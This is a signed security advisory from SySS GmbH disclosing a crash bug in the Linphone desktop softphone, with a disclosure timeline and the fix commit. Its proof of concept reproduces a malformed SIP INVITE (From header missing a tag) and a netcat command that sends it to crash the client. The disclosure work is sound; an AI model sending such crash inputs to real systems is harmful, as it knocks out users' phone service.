-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Advisory ID: SYSS-2021-014 Product: Linphone Manufacturer: Belledonne Communications Affected Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19) Tested Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19) Vulnerability Type: Null Pointer Dereference (CWE-476) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2021-03-26 Solution Date: 2021-09-06 Public Disclosure: 2021-10-13 CVE Reference: - Author of Advisory: Moritz Abrell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Linphone [1] is an open source SIP-based softphone. It provides calling, presence and IM features. If a special crafted SIP INVITE request is sent to the softphone, the software crashes. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Sending a SIP INVITE request without a "tag" parameter in the "From" header to a machine running Linphone is causing the Linphone client to crash due to a NULL pointer. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following SIP INVITE request is causing the Linphone client to crash: INVITE sip:100@192.168.122.168 SIP/2.0 Via: SIP/2.0/UDP 192.168.122.1:40709;branch=z9hG4bK7pqwjtzswe Max-Forwards: 70 To: From: Contact: Call-ID: 38tn4shategtc3i9gmspx38ds94qb2st CSeq: 1 INVITE User-Agent: WireBug Expires: 600 Content-Length: 0 Notice that the "tag" parameter in the "From" header is missing. Send it to the machine running Linphone via netcat: cat invite.txt | nc 192.168.122.168 5060 -u ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer fixed this vulnerability within the commit 742334647fcde614c4126834fa9f59931efb2d59 in the public GitHub repositroy. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-03-26: Vulnerability reported to manufacturer 2021-04-01: Renewed notification to the manufacturer due to lack of feedback 2021-04-07: Renewed notification to the manufacturer due to lack of feedback 2021-05-17: Renewed notification to the manufacturer due to lack of feedback 2021-05-17: Response and confirmation of the vulnerabilities by the manufacturer 2021-09-06: Fix of the vulnerability provided by the manufacturer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1]: Product website for Linphone: https://www.linphone.org/ [2]: SySS Responsible Disclosure Policy: https://www.syss.de/en/news/responsible-disclosure-policy/ [3] Fix by the manufacturer: https://github.com/BelledonneCommunications/belle-sip/commit/742334647fcde614c4126834fa9f59931efb2d59 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail: moritz.abrell@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmFlnAEACgkQrgyb+PE0 i1M7bhAAvEjDJseZaHOAx4kiiC6baiZGnqFMwbmC0a8/9g5kQs+FAwzd7WhesK/P 7uPGXrb1ruDSPmNgm6bNybMbLfW6MGVHM4+M93iTlq8rXx9nmltuXWnIoLGfK/fo uGWuRl2nZsLmd+CkIy1p2JoIda/TLVz8vi2JSDEjiyxRZ3Qck5eNP57FmF/Ck9vM /Z51JBAkEvf9KcVW/NdGRnoDDrDwFhj2GadGfB9NwE2Yt4kSjggYYG+E3BgtRrqk x0mZPoOZTcAMXw+hf+HpyAmrQkvfW15aIY9q/gGIOgKGu0MafsoDMNOlUz6ey4jL RDPbLbc3wNAM14wkqhp5UgNMB0RHIcS8LbpjEF0c+Z+dxJgfv4twG6PAXLnkMCdp vN7m8Ye+OXWk1DtmE4Cy/am7itLLWbETFaBloFjFZTqwNgK8WPIbeNjXEeTrxwmf J6DyjnCztBz3YlF9Vd8Oc+jQvNax0e1ThmFZUOV2gjpAKImydAzXHbIhpspnMnAD i8pm4DDkoj9S+tJ2UoI4RWn/v/H5XOGwQdx3TrlTGFv6Lh1iRB43CUOoOclT+EQ8 IsAjYgm93z8+qBmsX90TK/gpadwGYouFjbTq6wexeawH7C+LrwbEJ7iAGAkvyqQI ulw30dKBBCzTDqyRWtFoNKvvwX5AdGEnA+q9eHyRY8gFiDSIXtE= =+Irl -----END PGP SIGNATURE-----